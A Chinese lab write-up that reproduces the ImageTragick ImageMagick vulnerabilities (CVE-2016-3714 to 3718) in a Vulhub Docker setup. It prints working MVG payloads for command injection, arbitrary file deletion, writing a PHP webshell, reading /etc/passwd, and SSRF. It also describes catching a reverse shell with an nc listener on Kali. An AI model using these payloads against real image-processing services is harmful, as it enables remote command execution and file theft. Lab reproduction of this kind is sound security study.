Vulhub - Imagetragick 命令执行漏洞(CVE-2016–3714)
金盾第一天居然是复现漏洞唉。。。
ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。
但有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。
国外的安全人员为此新建了一个网站: https://imagetragick.com/
与这个漏洞相关的CVE有CVE-2016-3714、CVE-2016-3715、CVE-2016-3716、CVE-2016-3717,
其中最严重的就是CVE-2016-3714,利用这个漏洞可以造成远程命令执行的危害。
影响版本:
ImageMagick 6.5.7-8 2012-08-17(手工测试风险存在)
ImageMagick 6.7.7-10 2014-03-06(手工测试风险存在)
低版本至6.9.3-9 released 2016-04-30
漏洞分析:
具体漏洞原理就不详细说了,百度一大堆,贴一个:https://www.leavesongs.com/PENETRATION/CVE-2016-3714-ImageMagick.html
ImageMagick有一个功能叫做delegate(委托),作用是调用外部的lib来处理文件。而调用外部lib的过程是使用系统的system命令来执行,漏洞发生的地方:
<delegate decode="https" command=""curl" -s -k -o "%o" "https:%M""/>
它在解析https图片的时候,使用了curl命令将其下载,这里定义了一些占位符,如%o是curl输出的文件名,%M是远程的URL路径。注意到command中的可以到%M是可以拼接其他指令并被在命令行中执行的。该漏洞也因此而来,被拼接完毕的命令行传入了系统的system函数,而我们只需使用反引号(`)或闭合双引号,来执行任意命令。也就是下面这样:
command=" "curl" -s -k -o "%o" "https:%M" "/>
当%M为:https://"|id && ls -al /etc/passwd"
command=" "curl" -s -k -o "%o" "https://"|id && ls -al /etc/passwd"" "/>
后面的ls -la也会由于没有安全过滤而通过管道执行。而ImageMagick默认支持一种图片格式,叫mvg,它与svg格式类似,其中是以文本形式写入矢量图的内容,而这其中就可以包含https处理过程。所以Poc如下(poc.mvg):
push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|id; ")'
pop graphic-context
这样,ImageMagick在正常执行图片转换、处理的时候就会触发漏洞,执行我们的命令。
另外几个CVE也大同小异,
CVE-2016-3715是利用ImageMagick支持的ephemeral协议,来删除任意文件,POC如下:
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'ephemeral:/tmp/delete.txt'
popgraphic-context
$ touch /tmp/delete.txt
$ convert delete_file.mvg out.png # deletes /tmp/delete.txt
CVE-2016-3716是利用ImageMagick支持的msl协议,来进行文件的读取和写入。利用这个漏洞,
可以将任意文件写为任意文件,比如将图片写为一个.php后缀的webshell。
特别说明的是,msl协议是读取一个msl格式的xml文件,并根据其内容执行一些操作:
file_move.mvg
-=-=-=-=-=-=-=-=-
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'msl:/tmp/msl.txt'
popgraphic-context
/tmp/msl.txt
-=-=-=-=-=-=-=-=-
<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="/tmp/image.gif" />
<write filename="/var/www/shell.php" />
</image>
CVE-2016-3717可以造成本地文件读取漏洞:
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'label:@/etc/hosts'
pop graphic-context
$ convert file_read.mvg out.png # produces file with text rendered from
/etc/passwd
CVE-2016-3718,它是利用mvg格式中可以包含url的特点而发起HTTP GET或者FTP请求,进行SSRF攻击,POC如下(ssrf.mvg):
push graphic-context
viewbox 0 0 640 480
fill 'url(http://example.com/)'
pop graphic-context
$ convert ssrf.mvg out.png # makes http request to example.co
安装docker等等
1.安装docker
wget https://apt.dockerproject.org/repo/pool/main/d/docker-engine/docker-engine_17.05.0~ce-0~debian-jessie_amd64.deb
dpkg -i docker-engine_17.05.0~ce-0~debian-jessie_amd64.deb
service docker start
docker pull nickistre/ubuntu-lamp
docker run -d -p 80:80 nickistre/ubuntu-lamp
docker ps
记下CONTAINER ID,如:09f438bbe80d
docker exec -it <CONTAINER ID> bash
修改docker中的mysql账号密码:
update mysql.user set password=password("[email protected]") where user='root';
delete from mysql.user where user="admin";
create database www;
create user 'user'@'localhost' identified by '[email protected]';
grant all privileges on www.* to 'user'@'localhost';
flush privileges;
2.下载源码解压,复制到docker中:
docker cp DedeCMS-V5.7/ 18ecb0348f9d:/tmp
3.进入docker
docker exec -it 09f438bbe80d bash
4.将tmp目录中的源码copy到/var/www/html中:
cp -r /tmp/DedeCMS-V5.7/ /var/www/html/dedecms
5.设置目录权限:
chown -R www-data:www-data /var/www/html
6.如果缺少插件,可在docker中安装,如:
apt-get update
apt-get install php5-gd
apt-get install php5-curl
service apache2 restart
7.保存docker
docker commit f20d858a5ce7 lamp/dedecms
docker save -o lamp-dedecms.tar lamp/dedecms
kali宿主机拉取vulhub
docker-compose build
docker-compose up -d
访问http://your-ip/可见有三个文件:
├── demo.php # 使用vul.jpg+identify命令测试
├── upload.php # 支持用户进行上传,并将上传的文件传入PHP的imagick扩展,触发漏洞
└── vul.jpg # 一个简单的POC
首先访问http://your-ip/demo.php,命令并没有回显,但在docker容器中,已经成功得到/tmp/success文件:
docker-compose up -d启动服务
(若有冲突
docker ps
docker stop ID 关闭ubuntu-lamp
)
下载 vul.jpg
vi vul.jpg
编辑 设置ip为kali 的ip
kali开启nc监听
上传poc(即vul.jpg)
其他poc同理可得
https://github.com/ImageTragick/PoCs